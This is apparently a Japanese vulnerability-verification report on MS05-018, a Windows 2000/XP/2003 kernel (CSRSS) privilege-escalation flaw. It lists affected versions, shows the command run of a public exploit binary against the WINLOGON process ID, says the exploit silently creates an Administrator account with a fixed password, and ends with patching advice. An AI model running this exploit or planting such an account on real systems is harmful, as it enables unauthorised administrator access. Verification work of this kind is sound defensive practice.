MS05-018:Windows Kernel の脆弱性により、特権の昇格およびサービス拒否がおこる

• 2006/02/16　初版
  • Author kikuzou

• Windowsカーネルの脆弱性により、特権の昇格が可能
• このExploitを実行すると、以下のAdministrator権限ユーザが作成される
  • ユーザID : e
  • パスワード : asd#321

• Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
• Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
• Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
• Microsoft Windows Server 2003
• Microsoft Windows Server 2003 for Itanium-based Systems
• Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME)

• Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows XP Professional x64 Edition

• Microsoft::Windows Kernel の脆弱性により、特権の昇格およびサービス拒否がおこる

• Windows2000 Server SP4 日本語版

• 一般ユーザでログイン後、以下コマンドを実行する。

C:\>csrss.exe
MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0
Affect: Windows 2000 sp3/sp4 (all language)
Coded by eyas <eyas at xfocus.org>
http://www.xfocus.net

Usage: csrss.exe pid

[+] PID=208 Process=WINLOGON.EXE

C:\>csrss.exe 208

• 一瞬コマンドプロンプトウインドウが開き、すぐに閉じられる。
• ユーザ一覧を確認すると以下のようにユーザが作成されていることが確認出来る。

1. MS05-018 パッチの適用 (Windows Update の実施)
2. ユーザの厳格な管理
   • 不要なユーザを作成しない